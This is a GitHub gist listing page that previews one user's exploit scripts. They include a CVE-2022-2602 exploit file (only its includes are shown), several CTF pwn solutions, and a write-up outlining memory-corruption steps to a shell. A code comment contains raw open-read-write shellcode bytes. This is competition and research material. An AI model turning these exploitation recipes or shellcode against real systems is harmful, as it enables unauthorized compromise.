Skip to content

Instantly share code, notes, and snippets.

View Mipu94's full-sized avatar

sungta Mipu94

47 followers · 10 following
View GitHub Profile
@Mipu94
Mipu94 / CVE-2022-2602-stable.c
Last active March 26, 2023 17:35
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <liburing.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
@Mipu94
Mipu94 / crytointheshell.md
Created October 18, 2019 17:37
Crypto in the Shell - HITCON-CTF-2019

Crypto in the Shell - HITCON-CTF-2019

The bug is interger overflow, so we can write everywhere.

  1. To leak the key, overwrite the key then leak 1 by 1 byte.
  2. After leak the key we leak the libc and binary address at 0x202360 and 0x202000.
  3. then we leak stack by _argvs variable in mmap section.
  4. We need to overwrite one_gadget to return address which is saved in stack. But we only have 32 times to write, so we should overwrite variable i(of the for loop in main function) to negative number, then we can write more than 32.
  5. Bruteforce to write 1 by 1 byte to overwrite one_gadget to return address of main function.
  6. overwrite i to big number, then exit and get the shell.
import time
@Mipu94
Mipu94 / securenote.py
Created October 8, 2019 08:21
writeup securenote - Balsn CTF
# solves: 0 - 1000 pts
# bug: strcpy(dest, s) -> off byte one.
# the content of notes were xor-ed with AES-hashes: MEM = content ^ hashes
# show function will print out: contents = MEM ^ hashes
# if MEM = 0x00 => leak hashes
# the idea is overwrite last null byte then use show function to leak hashes.
# in my solution, I try to set IV[0](counter[0]) to constant value X(heap + 0x280) then leak hashes of this IV[0]=X and turn back to IV[0]=X several times.
import time
import socket
@Mipu94
Mipu94 / two.py
Created November 9, 2017 08:58
two-hitcon2017
import sys
sys.path.append("/home/athos/ctf/form")
from customlibpwn import *
import socket
from struct import pack,unpack
from ctypes import c_int32
import telnetlib
@Mipu94
Mipu94 / pwn.py
Last active August 25, 2017 09:36
babystack-hitb2017.py
from customlibpwn import *
def p(m):
return pack("<I", m)
def u(m):
return unpack("<I", m)[0]
########################################################
# PWN! PWN! PWN!
########################################################
@Mipu94
Mipu94 / ruma-pwn.py
Last active July 3, 2017 04:56
#this is useafterfree challenge,to trigger bug we need more than 10 item (0x08048DF5).
#we need run this script sevaral times to get shell
from customlibpwn import *
########################################################
# PWN! PWN! PWN!
########################################################
def change_name(name):
send("3")
recvu("what is your name?:")
send(name)
@Mipu94
Mipu94 / customlibpwn.py
Created May 29, 2016 08:32
import socket
from pwn import *
from struct import pack,unpack
from ctypes import c_int32
import telnetlib
import ctypes
import string
import os
ascii=cs = string.letters+string.punctuation+string.digits+' '
@Mipu94
Mipu94 / matectf5-readwrite.py
Last active May 30, 2016 07:37
import sys
sys.path.append("/home/athos/ctf/form")
from customlibpwn import *
global s
#def write_got(system,got_addr,n):
#def virtual_chunk(save_addr,bit=32)
#64bit fmt stack/bit + 6
#open-read-write flag 32bit: hflag[H1\xf6VSH\x89\xe7j\x02X\x0f\x05P_U^jAZH1\xc0\x0f\x05H1\xc0H1\xffH\xff\xc7H\xff\xc0\x0f\x05
#32 system=0x468f0 ; binsh=0x17dbc5
@Mipu94
Mipu94 / matesctf5-bookpwn.py
Last active May 30, 2016 07:37
import sys
sys.path.append("/home/athos/ctf/form")
from customlibpwn import *
global s
#def write_got(system,got_addr,n):
#def virtual_chunk(save_addr,bit=32)
#64bit fmt stack/bit + 6